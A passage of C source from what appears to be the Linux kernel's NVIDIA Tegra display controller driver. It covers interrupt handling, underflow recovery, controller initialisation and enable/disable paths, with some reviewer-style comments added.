	if (dc->underflow_mask & WIN_A_UF_INT)
		dc->stats.underflows_a += tegra_dc_underflow_count(dc,
			DC_WINBUF_AD_UFLOW_STATUS);
	if (dc->underflow_mask & WIN_B_UF_INT)
		dc->stats.underflows_b += tegra_dc_underflow_count(dc,
			DC_WINBUF_BD_UFLOW_STATUS);
	if (dc->underflow_mask & WIN_C_UF_INT)
		dc->stats.underflows_c += tegra_dc_underflow_count(dc,
			DC_WINBUF_CD_UFLOW_STATUS);

	/* Check for any underflow reset conditions */
	for (i = 0; i < DC_N_WINDOWS; i++) {
		if (dc->underflow_mask & (WIN_A_UF_INT << i)) {
			dc->windows[i].underflows++;

#ifdef CONFIG_ARCH_TEGRA_2x_SOC
			if (dc->windows[i].underflows > 4) {
				schedule_work(&dc->reset_work);
				/* reset counter */
				dc->windows[i].underflows = 0;
				trace_display_reset(dc);
			}
#endif
#ifdef CONFIG_ARCH_TEGRA_3x_SOC
			if (dc->windows[i].underflows > 4) {
				trace_display_reset(dc);
				/* pulse UF_LINE_FLUSH on, latch, then off,
				 * latch again to recover the window */
				tegra_dc_writel(dc, UF_LINE_FLUSH,
					DC_DISP_DISP_MISC_CONTROL);
				tegra_dc_writel(dc, GENERAL_UPDATE,
					DC_CMD_STATE_CONTROL);
				tegra_dc_writel(dc, GENERAL_ACT_REQ,
					DC_CMD_STATE_CONTROL);

				tegra_dc_writel(dc, 0,
					DC_DISP_DISP_MISC_CONTROL);
				tegra_dc_writel(dc, GENERAL_UPDATE,
					DC_CMD_STATE_CONTROL);
				tegra_dc_writel(dc, GENERAL_ACT_REQ,
					DC_CMD_STATE_CONTROL);
			}
#endif
		} else {
			dc->windows[i].underflows = 0;
		}
	}

	/* Clear the underflow mask now that we've checked it. */
	tegra_dc_writel(dc, dc->underflow_mask, DC_CMD_INT_STATUS);
	dc->underflow_mask = 0;
	tegra_dc_unmask_interrupt(dc, ALL_UF_INT);
	trace_underflow(dc);
}
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
/* Bottom-half V_PULSE2 worker (vblank analogue for smart-dimmer setups
 * that use the vpulse2 interrupt): maintains the vpulse2 ref-count bits
 * and runs the brightness update, mirroring tegra_dc_vblank(). */
static void tegra_dc_vpulse2(struct work_struct *work)
{
	struct tegra_dc *dc = container_of(work, struct tegra_dc, vpulse2_work);
	bool nvsd_updated = false;

	mutex_lock(&dc->lock);
	if (!dc->enabled) {
		mutex_unlock(&dc->lock);
		return;
	}

	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);

	/* Clear the V_PULSE2_FLIP if no update */
	if (!tegra_dc_windows_are_dirty(dc))
		clear_bit(V_PULSE2_FLIP, &dc->vpulse2_ref_count);

	/* Update the SD brightness */
	if (dc->out->sd_settings && dc->out->sd_settings->use_vpulse2) {
		nvsd_updated = nvsd_update_brightness(dc);
		if (nvsd_updated) {
			set_bit(V_PULSE2_NVSD, &dc->vpulse2_ref_count);
			tegra_dc_unmask_interrupt(dc, V_PULSE2_INT);
		} else {
			clear_bit(V_PULSE2_NVSD, &dc->vpulse2_ref_count);
		}
	}

	/* Mask vpulse2 interrupt if ref-count is zero. */
	if (!dc->vpulse2_ref_count)
		tegra_dc_mask_interrupt(dc, V_PULSE2_INT);

	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);

	/* Do the actual brightness update outside of the mutex dc->lock */
	if (nvsd_updated)
		tegra_dc_prism_update_backlight(dc);
}
#endif
#ifndef CONFIG_TEGRA_FPGA_PLATFORM
/* IRQ dispatch for one-shot (tearing-effect) panels: wake any user
 * waiting in tegra_dc_wait_for_vsync(), latch windows on V_BLANK,
 * signal frame-end, and kick the vpulse2 worker where supported. */
static void tegra_dc_one_shot_irq(struct tegra_dc *dc, unsigned long status)
{
	/* pending user vblank, so wakeup */
	if ((status & (V_BLANK_INT | MSF_INT)) &&
		(dc->out->user_needs_vblank)) {
		dc->out->user_needs_vblank = false;
		complete(&dc->out->user_vblank_comp);
	}

	if (status & V_BLANK_INT) {
		/* Sync up windows. */
		tegra_dc_trigger_windows(dc);

		/* Schedule any additional bottom-half vblank actvities. */
		queue_work(system_freezable_wq, &dc->vblank_work);
	}

	if (status & FRAME_END_INT) {
		/* Mark the frame_end as complete. */
		if (!completion_done(&dc->frame_end_complete))
			complete(&dc->frame_end_complete);
	}

#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
	if (status & V_PULSE2_INT)
		queue_work(system_freezable_wq, &dc->vpulse2_work);
#endif
}
/* IRQ dispatch for continuous-refresh outputs: queue the vblank worker,
 * and on frame-end record the timestamp, wake timestamp waiters, signal
 * frame-end and latch windows. */
static void tegra_dc_continuous_irq(struct tegra_dc *dc, unsigned long status)
{
	/* Schedule any additional bottom-half vblank actvities. */
	if (status & V_BLANK_INT)
		queue_work(system_freezable_wq, &dc->vblank_work);

	if (status & FRAME_END_INT) {
		struct timespec tm = CURRENT_TIME;
		dc->frame_end_timestamp = timespec_to_ns(&tm);
		wake_up(&dc->timestamp_wq);

		/* Mark the frame_end as complete. */
		if (!completion_done(&dc->frame_end_complete))
			complete(&dc->frame_end_complete);

		tegra_dc_trigger_windows(dc);
	}

#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
	if (status & V_PULSE2_INT)
		queue_work(system_freezable_wq, &dc->vpulse2_work);
#endif
}
/* XXX: Not sure if we limit look ahead to 1 frame */
/* True when timestamp @ts falls less than one frame time after the most
 * recent frame-end timestamp. */
bool tegra_dc_is_within_n_vsync(struct tegra_dc *dc, s64 ts)
{
	BUG_ON(!dc->frametime_ns);
	return ((ts - dc->frame_end_timestamp) < dc->frametime_ns);
}
/* True when @new_ts and @old_ts are separated by at least one vsync:
 * either they are more than a frame time apart, or they fall into
 * different frame intervals relative to the last frame end. */
bool tegra_dc_does_vsync_separate(struct tegra_dc *dc, s64 new_ts, s64 old_ts)
{
	BUG_ON(!dc->frametime_ns);
	return (((new_ts - old_ts) > dc->frametime_ns)
		|| (div_s64((new_ts - dc->frame_end_timestamp), dc->frametime_ns)
			!= div_s64((old_ts - dc->frame_end_timestamp),
				dc->frametime_ns)));
}
#endif
/* Top-level DC interrupt handler (threaded-context safe: takes
 * dc->lock and enables clocks).  Acks everything except underflow bits,
 * which are deferred to underflow_work; then dispatches to the
 * one-shot or continuous handler and applies any pending mode change.
 * On FPGA platforms DC interrupts are unsupported. */
static irqreturn_t tegra_dc_irq(int irq, void *ptr)
{
#ifndef CONFIG_TEGRA_FPGA_PLATFORM
	struct tegra_dc *dc = ptr;
	unsigned long status;
	unsigned long underflow_mask;
	u32 val;
	int need_disable = 0;

	mutex_lock(&dc->lock);
	if (!dc->enabled || !tegra_dc_is_powered(dc)) {
		mutex_unlock(&dc->lock);
		return IRQ_HANDLED;
	}

	clk_prepare_enable(dc->clk);
	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);

	if (!nvhost_module_powered_ext(dc->ndev)) {
		WARN(1, "IRQ when DC not powered!\n");
		/* ack and bail: registers are not trustworthy here */
		status = tegra_dc_readl(dc, DC_CMD_INT_STATUS);
		tegra_dc_writel(dc, status, DC_CMD_INT_STATUS);
		tegra_dc_release_dc_out(dc);
		tegra_dc_io_end(dc);
		clk_disable_unprepare(dc->clk);
		mutex_unlock(&dc->lock);
		return IRQ_HANDLED;
	}

	/* clear all status flags except underflow, save those for the worker */
	status = tegra_dc_readl(dc, DC_CMD_INT_STATUS);
	tegra_dc_writel(dc, status & ~ALL_UF_INT, DC_CMD_INT_STATUS);
	val = tegra_dc_readl(dc, DC_CMD_INT_MASK);
	tegra_dc_writel(dc, val & ~ALL_UF_INT, DC_CMD_INT_MASK);

	/*
	 * Overlays can get their internal state corrupted during an underflow
	 * condition. The only way to fix this state is to reset the DC.
	 * if we get 4 consecutive frames with underflows, assume we're
	 * hosed and reset.
	 */
	underflow_mask = status & ALL_UF_INT;

	/* Check underflow */
	if (underflow_mask) {
		dc->underflow_mask |= underflow_mask;
		schedule_delayed_work(&dc->underflow_work,
			msecs_to_jiffies(1));
	}

	if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE)
		tegra_dc_one_shot_irq(dc, status);
	else
		tegra_dc_continuous_irq(dc, status);

	/* update video mode if it has changed since the last frame */
	if (status & (FRAME_END_INT | V_BLANK_INT))
		if (tegra_dc_update_mode(dc))
			need_disable = 1; /* force display off on error */

	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	clk_disable_unprepare(dc->clk);
	mutex_unlock(&dc->lock);

	/* must be done after dc->lock is dropped: disable takes the lock */
	if (need_disable)
		tegra_dc_disable(dc);
	return IRQ_HANDLED;
#else /* CONFIG_TEGRA_FPGA_PLATFORM */
	return IRQ_NONE;
#endif /* !CONFIG_TEGRA_FPGA_PLATFORM */
}
/* Program DC_DISP_DISP_COLOR_CONTROL from the output's color depth and
 * dither settings (plus the CMU enable bit when configured). */
void tegra_dc_set_color_control(struct tegra_dc *dc)
{
	u32 color_control;

	/* map bits-per-pixel to the base color size field; 24 bpp and any
	 * unlisted depth fall back to 888 */
	switch (dc->out->depth) {
	case 3:
		color_control = BASE_COLOR_SIZE111;
		break;

	case 6:
		color_control = BASE_COLOR_SIZE222;
		break;

	case 8:
		color_control = BASE_COLOR_SIZE332;
		break;

	case 9:
		color_control = BASE_COLOR_SIZE333;
		break;

	case 12:
		color_control = BASE_COLOR_SIZE444;
		break;

	case 15:
		color_control = BASE_COLOR_SIZE555;
		break;

	case 16:
		color_control = BASE_COLOR_SIZE565;
		break;

	case 18:
		color_control = BASE_COLOR_SIZE666;
		break;

	default:
		color_control = BASE_COLOR_SIZE888;
		break;
	}

	switch (dc->out->dither) {
	case TEGRA_DC_DISABLE_DITHER:
		color_control |= DITHER_CONTROL_DISABLE;
		break;
	case TEGRA_DC_ORDERED_DITHER:
		color_control |= DITHER_CONTROL_ORDERED;
		break;
	case TEGRA_DC_ERRDIFF_DITHER:
		/* The line buffer for error-diffusion dither is limited
		 * to 1280 pixels per line. This limits the maximum
		 * horizontal active area size to 1280 pixels when error
		 * diffusion is enabled.
		 */
		BUG_ON(dc->mode.h_active > 1280);
		color_control |= DITHER_CONTROL_ERRDIFF;
		break;
	}

#ifdef CONFIG_TEGRA_DC_CMU
	if (dc->pdata->flags & TEGRA_DC_FLAG_CMU_ENABLE)
		color_control |= CMU_ENABLE;
#endif

	tegra_dc_writel(dc, color_control, DC_DISP_DISP_COLOR_CONTROL);
}
/* Map window index @idx to its host1x syncpoint id.  An out-of-range
 * index is a driver bug.  Restructured so the valid path always ends in
 * a return: the original fell off the end of a non-void function when
 * BUG() is compiled to a no-op (CONFIG_BUG=n). */
static u32 get_syncpt(struct tegra_dc *dc, int idx)
{
	BUG_ON(idx < 0 || idx >= (int)ARRAY_SIZE(dc->win_syncpt));
	return dc->win_syncpt[idx];
}
/* Set up the V_PULSE2 interrupt (post-Tegra3 chips only): position the
 * pulse one line after the active region, enable but leave it masked
 * (workers unmask on demand), and turn the pulse generator on. */
static void tegra_dc_init_vpulse2_int(struct tegra_dc *dc)
{
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
	u32 start, end;
	unsigned long val;

	val = V_PULSE2_H_POSITION(0) | V_PULSE2_LAST(0x1);
	tegra_dc_writel(dc, val, DC_DISP_V_PULSE2_CONTROL);

	/* first line after vertical active */
	start = dc->mode.v_ref_to_sync + dc->mode.v_sync_width +
		dc->mode.v_back_porch + dc->mode.v_active;
	end = start + 1;
	val = V_PULSE2_START_A(start) + V_PULSE2_END_A(end);
	tegra_dc_writel(dc, val, DC_DISP_V_PULSE2_POSITION_A);

	val = tegra_dc_readl(dc, DC_CMD_INT_ENABLE);
	val |= V_PULSE2_INT;
	tegra_dc_writel(dc, val , DC_CMD_INT_ENABLE);

	tegra_dc_mask_interrupt(dc, V_PULSE2_INT);
	tegra_dc_writel(dc, V_PULSE_2_ENABLE, DC_DISP_DISP_SIGNAL_OPTIONS0);
#endif
}
/* Bring a DC from reset to a working configuration: memory-client
 * priorities, syncpoint and interrupt setup, CMU/color control, per-
 * window CSC/LUT/filter defaults, syncpoint min/max resync, mode
 * programming, and finally smart-dimmer init.
 * Returns 0, or -EINVAL if mode programming fails. */
static int tegra_dc_init(struct tegra_dc *dc)
{
	int i;
	int int_enable;
/* NOTE(review): '#if CONFIG_ESD_READ_TE' evaluates the macro as an
 * expression — '#ifdef' is the usual kernel idiom; confirm how the
 * config symbol is defined. */
#if CONFIG_ESD_READ_TE
	static int initflag_ext = 0;
#endif

	tegra_dc_io_start(dc);
	tegra_dc_writel(dc, 0x00000100, DC_CMD_GENERAL_INCR_SYNCPT_CNTRL);
	if (dc->ndev->id == 0) {
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0A,
				TEGRA_MC_PRIO_MED);
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0B,
				TEGRA_MC_PRIO_MED);
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0C,
				TEGRA_MC_PRIO_MED);
#if defined(CONFIG_ARCH_TEGRA_2x_SOC) || defined(CONFIG_ARCH_TEGRA_3x_SOC)
		/* only present on Tegra2 and 3 */
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY1B,
				TEGRA_MC_PRIO_MED);
#endif
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAYHC,
				TEGRA_MC_PRIO_HIGH);
	} else if (dc->ndev->id == 1) {
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0AB,
				TEGRA_MC_PRIO_MED);
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0BB,
				TEGRA_MC_PRIO_MED);
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0CB,
				TEGRA_MC_PRIO_MED);
#if defined(CONFIG_ARCH_TEGRA_2x_SOC) || defined(CONFIG_ARCH_TEGRA_3x_SOC)
		/* only present on Tegra2 and 3 */
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY1BB,
				TEGRA_MC_PRIO_MED);
#endif
		tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAYHCB,
				TEGRA_MC_PRIO_HIGH);
	}
	tegra_dc_writel(dc, 0x00000100 | dc->vblank_syncpt,
			DC_CMD_CONT_SYNCPT_VSYNC);

	tegra_dc_writel(dc, 0x00004700, DC_CMD_INT_TYPE);
	tegra_dc_writel(dc, 0x0001c700, DC_CMD_INT_POLARITY);
	tegra_dc_writel(dc, 0x00202020, DC_DISP_MEM_HIGH_PRIORITY);
	tegra_dc_writel(dc, 0x00010101, DC_DISP_MEM_HIGH_PRIORITY_TIMER);
#ifdef CONFIG_ARCH_TEGRA_3x_SOC
	tegra_dc_writel(dc, 0x00000000, DC_DISP_DISP_MISC_CONTROL);
#endif
	/* enable interrupts for vblank, frame_end and underflows */
	int_enable = (FRAME_END_INT | V_BLANK_INT | ALL_UF_INT);
	/* for panels with one-shot mode enable tearing effect interrupt */
	if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE)
		int_enable |= MSF_INT;

	tegra_dc_writel(dc, int_enable, DC_CMD_INT_ENABLE);
	tegra_dc_writel(dc, ALL_UF_INT, DC_CMD_INT_MASK);
	tegra_dc_init_vpulse2_int(dc);

	tegra_dc_writel(dc, 0x00000000, DC_DISP_BORDER_COLOR);

#ifdef CONFIG_TEGRA_DC_CMU
	if (dc->pdata->cmu)
		_tegra_dc_update_cmu(dc, dc->pdata->cmu);
	else
		_tegra_dc_update_cmu(dc, &default_cmu);
#endif
#if CONFIG_ESD_READ_TE
	/* publish this DC once for the ESD/TE helper */
	if(initflag_ext == 0)
	{
		g_dc = dc;
		initflag_ext = 1;
	}
#endif
	tegra_dc_set_color_control(dc);
	for (i = 0; i < DC_N_WINDOWS; i++) {
		struct tegra_dc_win *win = &dc->windows[i];
		tegra_dc_writel(dc, WINDOW_A_SELECT << i,
				DC_CMD_DISPLAY_WINDOW_HEADER);
		tegra_dc_set_csc(dc, &win->csc);
		tegra_dc_set_lut(dc, win);
		tegra_dc_set_scaling_filter(dc);
	}

	for (i = 0; i < dc->n_windows; i++) {
		u32 syncpt = get_syncpt(dc, i);

		dc->syncpt[i].id = syncpt;

		/* resync cached min/max with the hardware counter */
		dc->syncpt[i].min = dc->syncpt[i].max =
			nvhost_syncpt_read_ext(dc->ndev, syncpt);
	}

	trace_display_mode(dc, &dc->mode);

	if (dc->mode.pclk) {
		if (tegra_dc_program_mode(dc, &dc->mode)) {
			tegra_dc_io_end(dc);
			return -EINVAL;
		}
	}

	/* Initialize SD AFTER the modeset.
	   nvsd_init handles the sd_settings = NULL case. */
	nvsd_init(dc, dc->out->sd_settings);

	tegra_dc_io_end(dc);

	return 0;
}
/* Power-on path for one controller: unpowergate, board enable hook,
 * clocks, register init via tegra_dc_init(), output-driver enable, and
 * the first GENERAL_UPDATE/ACT_REQ latch.  On init failure everything
 * brought up so far is torn down again.  Returns true on success. */
static bool _tegra_dc_controller_enable(struct tegra_dc *dc)
{
	int failed_init = 0;

	tegra_dc_unpowergate_locked(dc);

	if (dc->out->enable)
		dc->out->enable(&dc->ndev->dev);

	tegra_dc_setup_clk(dc, dc->clk);
	tegra_dc_clk_enable(dc);
	tegra_dc_io_start(dc);

	tegra_dc_power_on(dc);

	/* do not accept interrupts during initialization */
	tegra_dc_writel(dc, 0, DC_CMD_INT_MASK);

	enable_dc_irq(dc);

	failed_init = tegra_dc_init(dc);
	if (failed_init) {
		/* undo the partial bring-up in reverse order */
		tegra_dc_writel(dc, 0, DC_CMD_INT_MASK);
		disable_irq_nosync(dc->irq);
		tegra_dc_clear_bandwidth(dc);
		tegra_dc_clk_disable(dc);
		if (dc->out && dc->out->disable)
			dc->out->disable();
		tegra_dc_io_end(dc);
		return false;
	}

	if (dc->out_ops && dc->out_ops->enable)
		dc->out_ops->enable(dc);

	/* force a full blending update */
	dc->blend.z[0] = -1;

	tegra_dc_ext_enable(dc->ext);

	trace_display_enable(dc);

	tegra_dc_writel(dc, GENERAL_UPDATE, DC_CMD_STATE_CONTROL);
	tegra_dc_writel(dc, GENERAL_ACT_REQ, DC_CMD_STATE_CONTROL);

	if (dc->out->postpoweron)
		dc->out->postpoweron();

	tegra_log_resume_time();

	tegra_dc_io_end(dc);

	return true;
}
#ifdef CONFIG_ARCH_TEGRA_2x_SOC
/* Tegra2 underflow-recovery path: re-enable the controller around a
 * peripheral reset pulse.  The sibling DC's IRQ is quiesced (under its
 * lock) while the reset is asserted, then restored.  Returns false and
 * disables the controller again if re-init fails. */
static bool _tegra_dc_controller_reset_enable(struct tegra_dc *dc)
{
	bool ret = true;

	if (dc->out->enable)
		dc->out->enable(&dc->ndev->dev);

	tegra_dc_setup_clk(dc, dc->clk);
	tegra_dc_clk_enable(dc);

	/* quiesce the other controller during the shared reset pulse */
	if (dc->ndev->id == 0 && tegra_dcs[1] != NULL) {
		mutex_lock(&tegra_dcs[1]->lock);
		disable_irq_nosync(tegra_dcs[1]->irq);
	} else if (dc->ndev->id == 1 && tegra_dcs[0] != NULL) {
		mutex_lock(&tegra_dcs[0]->lock);
		disable_irq_nosync(tegra_dcs[0]->irq);
	}

	msleep(5);
	tegra_periph_reset_assert(dc->clk);
	msleep(2);
#ifdef CONFIG_TEGRA_SILICON_PLATFORM
	tegra_periph_reset_deassert(dc->clk);
	msleep(1);
#endif

	if (dc->ndev->id == 0 && tegra_dcs[1] != NULL) {
		enable_dc_irq(tegra_dcs[1]);
		mutex_unlock(&tegra_dcs[1]->lock);
	} else if (dc->ndev->id == 1 && tegra_dcs[0] != NULL) {
		enable_dc_irq(tegra_dcs[0]);
		mutex_unlock(&tegra_dcs[0]->lock);
	}

	enable_dc_irq(dc);

	if (tegra_dc_init(dc)) {
		dev_err(&dc->ndev->dev, "cannot initialize\n");
		ret = false;
	}

	if (dc->out_ops && dc->out_ops->enable)
		dc->out_ops->enable(dc);

	if (dc->out->postpoweron)
		dc->out->postpoweron();

	/* force a full blending update */
	dc->blend.z[0] = -1;

	tegra_dc_ext_enable(dc->ext);

	if (!ret) {
		dev_err(&dc->ndev->dev, "initialization failed,disabling");
		_tegra_dc_controller_disable(dc);
	}

	trace_display_reset(dc);
	return ret;
}
#endif
/* If no videomode has been programmed yet (pclk == 0), install a
 * fallback: for HDMI with a connected sink, the stock fallback mode.
 * NOTE(review): declared int but returns bool literals alongside
 * tegra_dc_set_fb_mode()'s result — callers appear to treat non-zero
 * as "mode was set"; confirm the intended convention. */
static int _tegra_dc_set_default_videomode(struct tegra_dc *dc)
{
	if (dc->mode.pclk == 0) {
		switch (dc->out->type) {
		case TEGRA_DC_OUT_HDMI:
		/* DC enable called but no videomode is loaded.
		     Check if HDMI is connected, then set fallback mode */
		if (tegra_dc_hpd(dc)) {
			return tegra_dc_set_fb_mode(dc,
					&tegra_dc_hdmi_fallback_mode, 0);
		} else
			return false;

		break;

		/* Do nothing for other outputs for now */
		case TEGRA_DC_OUT_RGB:

		case TEGRA_DC_OUT_DSI:

		default:
			return false;
		}
	}

	return false;
}
/* Public wrapper for _tegra_dc_set_default_videomode(). */
int tegra_dc_set_default_videomode(struct tegra_dc *dc)
{
	return _tegra_dc_set_default_videomode(dc);
}
/* Core enable: refuse when no pixel clock is programmed or no output
 * is bound; succeed trivially when already enabled; otherwise bring
 * the controller up.  Caller holds dc->lock. */
static bool _tegra_dc_enable(struct tegra_dc *dc)
{
	if (dc->mode.pclk == 0 || !dc->out)
		return false;

	if (dc->enabled)
		return true;

	return _tegra_dc_controller_enable(dc);
}
/* Public enable entry point: take dc->lock, attempt the enable once,
 * and record the resulting state. */
void tegra_dc_enable(struct tegra_dc *dc)
{
	mutex_lock(&dc->lock);

	if (!dc->enabled)
		dc->enabled = _tegra_dc_enable(dc);

	mutex_unlock(&dc->lock);
	trace_display_mode(dc, &dc->mode);
}
/* Power-down path for one controller: run the output driver's poweroff
 * hooks, mask and disable the IRQ, drop bandwidth, clear per-window
 * state, and flush (CPU-increment) every outstanding syncpoint fence so
 * no waiter is stranded.  Finally gate the clock. */
static void _tegra_dc_controller_disable(struct tegra_dc *dc)
{
	unsigned i;

	tegra_dc_hold_dc_out(dc);

	if (dc->out && dc->out->prepoweroff)
		dc->out->prepoweroff();

	if (dc->out_ops && dc->out_ops->disable)
		dc->out_ops->disable(dc);

	tegra_dc_writel(dc, 0, DC_CMD_INT_MASK);
	disable_irq_nosync(dc->irq);

	tegra_dc_clear_bandwidth(dc);

	if (dc->out && dc->out->disable)
		dc->out->disable();

	for (i = 0; i < dc->n_windows; i++) {
		struct tegra_dc_win *w = &dc->windows[i];

		/* reset window bandwidth */
		w->bandwidth = 0;
		w->new_bandwidth = 0;

		/* disable windows */
		w->flags &= ~TEGRA_WIN_FLAG_ENABLED;

		/* flush any pending syncpt waits */
		while (dc->syncpt[i].min < dc->syncpt[i].max) {
			trace_display_syncpt_flush(dc, dc->syncpt[i].id,
				dc->syncpt[i].min, dc->syncpt[i].max);
			dc->syncpt[i].min++;
			nvhost_syncpt_cpu_incr_ext(dc->ndev, dc->syncpt[i].id);
		}
	}
	trace_display_disable(dc);

	tegra_dc_clk_disable(dc);
	tegra_dc_release_dc_out(dc);
}
/* Intentionally a no-op: underflow interrupts (the stats source) are
 * managed by the reset worker, so the old toggle is kept disabled. */
void tegra_dc_stats_enable(struct tegra_dc *dc, bool enable)
{
#if 0 /* underflow interrupt is already enabled by dc reset worker */
	u32 val;
	if (dc->enabled)  {
		val = tegra_dc_readl(dc, DC_CMD_INT_ENABLE);
		if (enable)
			val |= (WIN_A_UF_INT | WIN_B_UF_INT | WIN_C_UF_INT);
		else
			val &= ~(WIN_A_UF_INT | WIN_B_UF_INT | WIN_C_UF_INT);
		tegra_dc_writel(dc, val, DC_CMD_INT_ENABLE);
	}
#endif
}
/* Stats collection is currently always on, so this always reports true;
 * the original conditional readback is preserved under #if 0. */
bool tegra_dc_stats_get(struct tegra_dc *dc)
{
#if 0 /* right now it is always enabled */
	u32 val;
	bool res;

	if (dc->enabled)  {
		val = tegra_dc_readl(dc, DC_CMD_INT_ENABLE);
		res = !!(val & (WIN_A_UF_INT | WIN_B_UF_INT | WIN_C_UF_INT));
	} else {
		res = false;
	}

	return res;
#endif
	return true;
}
/* make the screen blank by disabling all windows */
void tegra_dc_blank(struct tegra_dc *dc)
{
	struct tegra_dc_win *wins[DC_N_WINDOWS];
	unsigned idx;

	/* clear the enable flag on every window... */
	for (idx = 0; idx < DC_N_WINDOWS; idx++) {
		wins[idx] = tegra_dc_get_window(dc, idx);
		wins[idx]->flags &= ~TEGRA_WIN_FLAG_ENABLED;
	}

	/* ...then push the update and wait for it to latch */
	tegra_dc_update_windows(wins, DC_N_WINDOWS);
	tegra_dc_sync_windows(wins, DC_N_WINDOWS);
}
/*
 * Disable the head. For one-shot (command mode) panels, first cancel
 * the pending frame-trigger work under one_shot_lock; then power the
 * controller down and gate the display partition. Clears the
 * INITIALIZED_MODE flag so the panel is fully reinitialized on the
 * next enable.
 */
static void _tegra_dc_disable(struct tegra_dc *dc)
{
	if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE) {
		mutex_lock(&dc->one_shot_lock);
		cancel_delayed_work_sync(&dc->one_shot_work);
	}

	tegra_dc_io_start(dc);
	_tegra_dc_controller_disable(dc);
	tegra_dc_io_end(dc);
	tegra_dc_powergate_locked(dc);

	if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE)
		mutex_unlock(&dc->one_shot_lock);

	/*
	 * We will need to reinitialize the display the next time panel
	 * is enabled.
	 */
	dc->out->flags &= ~TEGRA_DC_OUT_INITIALIZED_MODE;
}
/*
 * Public disable entry point: tear down the DC extension client, flush
 * underflow work *before* taking dc->lock (so no new work can sneak in
 * between), then disable the head unless it is already suspended.
 * Waits for any in-flight IRQ handler before returning.
 */
void tegra_dc_disable(struct tegra_dc *dc)
{
	tegra_dc_ext_disable(dc->ext);

	/* it's important that new underflow work isn't scheduled before the
	 * lock is acquired. */
	cancel_delayed_work_sync(&dc->underflow_work);

	mutex_lock(&dc->lock);

	if (dc->enabled) {
		dc->enabled = false;

		if (!dc->suspended)
			_tegra_dc_disable(dc);
	}

#ifdef CONFIG_SWITCH
	switch_set_state(&dc->modeset_switch, 0);
#endif

	mutex_unlock(&dc->lock);
	synchronize_irq(dc->irq);
	trace_display_mode(dc, &dc->mode);
}
#ifdef CONFIG_ARCH_TEGRA_2x_SOC
/*
 * Tegra2-only recovery worker: when an overlay is stuck in underflow,
 * close the host read bus, put the DC in STOP mode, disable and reset
 * the controller, then re-enable it and reopen the read bus. Runs
 * under shared_lock to serialize against the other head.
 */
static void tegra_dc_reset_worker(struct work_struct *work)
{
	struct tegra_dc *dc =
		container_of(work, struct tegra_dc, reset_work);

	unsigned long val = 0;

	mutex_lock(&shared_lock);

	dev_warn(&dc->ndev->dev,
		"overlay stuck in underflow state. resetting.\n");

	tegra_dc_ext_disable(dc->ext);

	mutex_lock(&dc->lock);

	if (dc->enabled == false)
		goto unlock;

	dc->enabled = false;

	/*
	 * off host read bus
	 */
	val = tegra_dc_readl(dc, DC_CMD_CONT_SYNCPT_VSYNC);
	val &= ~(0x00000100);
	tegra_dc_writel(dc, val, DC_CMD_CONT_SYNCPT_VSYNC);

	/*
	 * set DC to STOP mode
	 */
	tegra_dc_writel(dc, DISP_CTRL_MODE_STOP, DC_CMD_DISPLAY_COMMAND);

	msleep(10);

	_tegra_dc_controller_disable(dc);

	/* _tegra_dc_controller_reset_enable deasserts reset */
	_tegra_dc_controller_reset_enable(dc);

	dc->enabled = true;

	/* reopen host read bus */
	val = tegra_dc_readl(dc, DC_CMD_CONT_SYNCPT_VSYNC);
	val &= ~(0x00000100);	/* NOTE(review): redundant — bit is set right below */
	val |= 0x100;
	tegra_dc_writel(dc, val, DC_CMD_CONT_SYNCPT_VSYNC);

unlock:
	mutex_unlock(&dc->lock);
	mutex_unlock(&shared_lock);
	trace_display_reset(dc);
}
#endif
/* Delayed work item: service a display underflow while holding dc->lock. */
static void tegra_dc_underflow_worker(struct work_struct *work)
{
	struct tegra_dc *dc = container_of(
		to_delayed_work(work), struct tegra_dc, underflow_work);

	mutex_lock(&dc->lock);
	tegra_dc_io_start(dc);
	tegra_dc_hold_dc_out(dc);

	if (dc->enabled)
		tegra_dc_underflow_handler(dc);

	tegra_dc_release_dc_out(dc);
	tegra_dc_io_end(dc);
	mutex_unlock(&dc->lock);
}
#ifdef CONFIG_SWITCH
/* Switch-class state printer for the modeset switch: "offline" when the
 * switch state is 0, otherwise the active resolution as "WxH". */
static ssize_t switch_modeset_print_mode(struct switch_dev *sdev, char *buf)
{
	struct tegra_dc *dc =
		container_of(sdev, struct tegra_dc, modeset_switch);

	if (!sdev->state)
		return sprintf(buf, "offline\n");

	return sprintf(buf, "%dx%d\n", dc->mode.h_active, dc->mode.v_active);
}
#endif
/*
 * Build an fb_monspecs mode list from the output's fixed mode table
 * and hand it to the framebuffer layer.
 *
 * Fix: the mode-table allocation was used unchecked, so an allocation
 * failure made tegra_dc_to_fb_videomode() dereference NULL. Use
 * kcalloc() (which also guards the len * size multiplication against
 * overflow) and bail out on failure.
 */
static void tegra_dc_add_modes(struct tegra_dc *dc)
{
	struct fb_monspecs specs;
	int i;

	memset(&specs, 0, sizeof(specs));

	specs.max_x = dc->mode.h_active * 1000;
	specs.max_y = dc->mode.v_active * 1000;
	specs.modedb_len = dc->out->n_modes;
